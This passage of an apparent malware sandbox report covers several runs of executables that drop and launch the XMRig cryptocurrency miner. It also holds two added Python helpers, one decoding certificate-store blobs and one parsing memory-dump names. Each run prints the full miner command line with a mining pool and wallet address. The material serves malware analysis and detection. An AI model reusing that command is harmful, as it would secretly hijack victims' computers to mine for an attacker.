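recorded above, embedded verbatim, and KEY_NAME the key it was written under."""
import hashlib
import struct
from typing import Dict, Tuple

KEY_NAME = "D1EB23A46D17D68FD92564C2F1F1601764D8E349"
PROP_SHA1, PROP_FRIENDLY, PROP_CERT, PROP_SHA256 = 3, 11, 32, 98  # CERT_*_PROP_ID, wincrypt.h

CERT_HEX = (  # DER certificate exactly as carried in property 32 of the blob
    "308204323082031aa003020102020101300d06092a864886f70d0101050500"
    "307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264"
    "311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573"
    "301e170d3034303130313030303030305a170d3238313233313233353935395a"
    "307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264"
    "311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573"
    "30820122300d06092a864886f70d01010105000382010f003082010a0282010100"
    "be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eea"
    "f115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a8"
    "91c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd9"
    "42e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc9"
    "0203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4"
    "300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff"
    "307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c"
    "3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c"
    "300d06092a864886f70d01010505000382010100"
    "0856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f"
    "5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de5340"
    "6c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74"
    "d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e"
)
BLOB_HEX = (  # records of (propId u32, reserved=1 u32, length u32, data), little-endian
    "0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286"              # 15: signature hash
    "090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a0304"
    "06082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308"  # 9: EKU
    "53000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0"
    "301b060567810c010330123010060a2b0601040182373c0101030200c0"                      # 83: root-program policies
    "620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"  # 98: SHA-256
    "0b000000010000001c0000005300650063007400690067006f002000280041004100410029000000"  # 11: friendly name, UTF-16LE
    "140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b4"              # 20: key identifier
    "1d00000001000000100000002e0d6875874a44c820912e85e964cfdb"                      # 29: subject-name MD5
    "030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349"              # 3: SHA-1, equals the key name
    "200000000100000036040000" + CERT_HEX                                            # 32: the certificate, 1078 bytes
)

def parse_cert_blob(blob: bytes) -> Dict[int, bytes]:
    """Records of (propId u32, reserved=1 u32, length u32, data) laid out back to back."""
    props, off = {}, 0
    while off < len(blob):
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1 or off + length > len(blob):
            raise ValueError(f"malformed property {prop_id} at offset {off - 12}")
        props[prop_id], off = blob[off:off + length], off + length
    return props

def der_tlv(buf: bytes, off: int) -> Tuple[int, int, int]:
    """(tag, content_start, content_end) of the definite-length TLV at off."""
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:                                    # long form: next N bytes hold the length
        n, length = length & 0x7F, 0
        for _ in range(n):
            length, off = (length << 8) | buf[off], off + 1
    return tag, off, off + length

def der_children(buf: bytes, start: int, end: int):
    out, off = [], start
    while off < end:
        out.append(der_tlv(buf, off))
        off = out[-1][2]
    return out

def tbs_summary(cert: bytes) -> Dict[str, object]:
    """Subject attributes and validity out of tbsCertificate: enough to name a root CA."""
    _, ts, te = der_tlv(cert, der_tlv(cert, 0)[1])          # Certificate -> tbsCertificate
    f = der_children(cert, ts, te)
    f = f[1:] if f[0][0] == 0xA0 else f                      # skip the explicit [0] version
    # f is now: serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo, extensions
    nb, na = der_children(cert, f[3][1], f[3][2])
    out: Dict[str, object] = {"not_before": cert[nb[1]:nb[2]].decode(), "not_after": cert[na[1]:na[2]].decode()}
    oid_names = {"550406": "C", "550408": "ST", "550407": "L", "55040a": "O", "550403": "CN"}
    for _, rs, re_ in der_children(cert, f[4][1], f[4][2]):            # RelativeDistinguishedName SETs
        for _, as_, ae in der_children(cert, rs, re_):                 # AttributeTypeAndValue SEQUENCEs
            (_, os_, oe), (_, vs, ve) = der_children(cert, as_, ae)
            out[oid_names.get(cert[os_:oe].hex(), cert[os_:oe].hex())] = cert[vs:ve].decode("latin-1")
    return out

def describe_blob(key_name: str, blob_hex: str) -> Dict[str, object]:
    props = parse_cert_blob(bytes.fromhex(blob_hex))
    cert = props[PROP_CERT]
    sha1, sha256 = hashlib.sha1(cert).hexdigest(), hashlib.sha256(cert).hexdigest()
    out = tbs_summary(cert)
    out.update(friendly_name=props[PROP_FRIENDLY].decode("utf-16-le").rstrip("\x00"),
               sha1=sha1, sha256=sha256, props=sorted(props),
               thumbprint_ok=(sha1 == key_name.lower() == props[PROP_SHA1].hex()),  # key name is the SHA-1
               sha256_ok=(sha256 == props[PROP_SHA256].hex()))
    return out

if __name__ == "__main__": print(describe_blob(KEY_NAME, BLOB_HEX))
```

The same decoder applied to a Root or TrustedPublisher write by an unknown process is the fast way to tell a self-signed interception or code-signing root from the public roots Windows caches on its own.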

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/1080-16-0x00000131E7260000-0x00000131E7280000-memory.dmp

memory/1080-17-0x00000131E72B0000-0x00000131E72D0000-memory.dmp

memory/1080-18-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-21-0x00000131E8BA0000-0x00000131E8BC0000-memory.dmp

memory/1080-19-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-20-0x00000131E72D0000-0x00000131E72F0000-memory.dmp

memory/1080-22-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-23-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-25-0x00000131E8BA0000-0x00000131E8BC0000-memory.dmp

memory/1080-24-0x00000131E72D0000-0x00000131E72F0000-memory.dmp

memory/1080-26-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-27-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-28-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-29-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-30-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-31-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-32-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-33-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-34-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-35-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-36-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-37-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-38-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-39-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-40-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-41-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-42-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-43-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-44-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-45-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-46-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-47-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-48-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-49-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-50-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-51-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-52-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-53-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-54-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-55-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-56-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-57-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-58-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-59-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-60-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-61-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-62-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-63-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-64-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-65-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-66-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-67-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-68-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-69-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-70-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-71-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-72-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-73-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-74-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-75-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-76-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-77-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-78-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-79-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-80-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-81-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-82-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-83-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

memory/1080-84-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 21:59

Platform

win10v2004-20240426-en

Max time kernel

1793s

Max time network

1800s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 matches recorded for this rule; the report carries no description, indicator, process or target for any of them (all four fields N/A on every row).

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 23.62.61.136:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 136.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4696-16-0x0000018C512C0000-0x0000018C512E0000-memory.dmp

memory/4696-17-0x0000018C51300000-0x0000018C51320000-memory.dmp

memory/4696-18-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-21-0x0000018C51320000-0x0000018C51340000-memory.dmp

memory/4696-20-0x0000018C51340000-0x0000018C51360000-memory.dmp

memory/4696-19-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-22-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-23-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-24-0x0000018C51340000-0x0000018C51360000-memory.dmp

memory/4696-25-0x0000018C51320000-0x0000018C51340000-memory.dmp

memory/4696-26-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-27-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-28-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-29-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-30-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-31-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-32-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-33-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-34-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-35-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-36-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-37-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-38-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-39-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-40-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-41-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-42-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-43-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-44-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-45-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-46-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-47-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-48-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-49-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-50-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-51-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-52-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-53-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-54-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-55-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-56-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-57-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-58-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-59-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-60-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-61-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-62-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-63-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-64-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-65-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-66-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-67-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-68-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-69-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-70-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-71-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-72-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-73-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-74-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-75-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-76-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-77-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-78-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-79-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-80-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-81-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-82-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-83-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp

memory/4696-84-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp
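The dump names above encode the PID, a sequence number and the address range that was dumped, and the same two sizes recur in every run: 0x20000-byte heap regions and a 0xB03000-byte region at a 0x7FF6/0x7FF7 base, the range where 64-bit images are loaded. The following Python, added here as an example and not part of the report, parses a constructed subset of the names for the three xmrig.exe processes seen so far (PIDs 3184, 1080 and 4696), groups the dumps per process and reports the region sizes common to all of them. The same size at a different base in every run is the same binary under ASLR, which matches the identical file hashes in each Files section and gives a quick cross-run check when the dumps themselves are not at hand. Function names are mine.

```python
"""Collapse the memory-dump listing into distinct regions and compare them across runs.
Added example, not part of the sandbox report; DUMP_NAMES is a constructed subset of the
dump names listed for the three xmrig.exe processes above (PIDs 3184, 1080 and 4696)."""
import re
from collections import Counter
from typing import Dict, Iterable, Set, Tuple

DUMP_NAME = re.compile(r"memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp")

DUMP_NAMES = [
    "memory/3184-16-0x000001CFE49D0000-0x000001CFE49F0000-memory.dmp",
    "memory/3184-18-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp",
    "memory/3184-21-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp",
    "memory/3184-22-0x00007FF7BB360000-0x00007FF7BBE63000-memory.dmp",
    "memory/1080-16-0x00000131E7260000-0x00000131E7280000-memory.dmp",
    "memory/1080-18-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp",
    "memory/1080-19-0x00007FF6930D0000-0x00007FF693BD3000-memory.dmp",
    "memory/4696-16-0x0000018C512C0000-0x0000018C512E0000-memory.dmp",
    "memory/4696-18-0x00007FF6B7D10000-0x00007FF6B8813000-memory.dmp",
]


def parse_dump_name(name: str) -> Tuple[int, int, int, int]:
    """-> (pid, sequence number, region start, region end)."""
    m = DUMP_NAME.fullmatch(name)
    if not m:
        raise ValueError(f"not a sandbox dump name: {name}")
    pid, seq, start, end = m.groups()
    return int(pid), int(seq), int(start, 16), int(end, 16)


def regions_by_pid(names: Iterable[str]) -> Dict[int, Counter]:
    """pid -> Counter{(start, end): how many dumps were taken of that range}."""
    out: Dict[int, Counter] = {}
    for name in names:
        pid, _seq, start, end = parse_dump_name(name)
        out.setdefault(pid, Counter())[(start, end)] += 1
    return out


def largest_region(by_pid: Dict[int, Counter], pid: int) -> Tuple[int, int, int]:
    """(start, size, dump count) of the biggest range dumped for pid; in these runs that is
    the 0x7FF... region where the 64-bit process image is mapped."""
    (start, end), count = max(by_pid[pid].items(), key=lambda kv: kv[0][1] - kv[0][0])
    return start, end - start, count


def sizes_common_to_all(by_pid: Dict[int, Counter]) -> Set[int]:
    """Region sizes seen in every process. Same size at a different base across runs
    is the same module (or allocation) under ASLR, so it can be matched without a hash."""
    per_pid = [{end - start for start, end in regions} for regions in by_pid.values()]
    return set.intersection(*per_pid) if per_pid else set()


if __name__ == "__main__":
    by_pid = regions_by_pid(DUMP_NAMES)
    for pid in sorted(by_pid):
        start, size, count = largest_region(by_pid, pid)
        print(f"pid {pid}: image region at {start:#x}, size {size:#x}, dumped {count}x")
    print("sizes common to all runs:", [hex(s) for s in sizes_common_to_all(by_pid)])
```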

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-23 16:09

Reported

2024-05-23 22:07

Platform

win10v2004-20240426-en

Max time kernel

1794s

Max time network

1794s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
62 matches recorded for this rule; the report carries no description, indicator, process or target for any of them (all four fields N/A on every row).

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.185:443 www.bing.com tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 185.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 23.62.61.185:443 www.bing.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
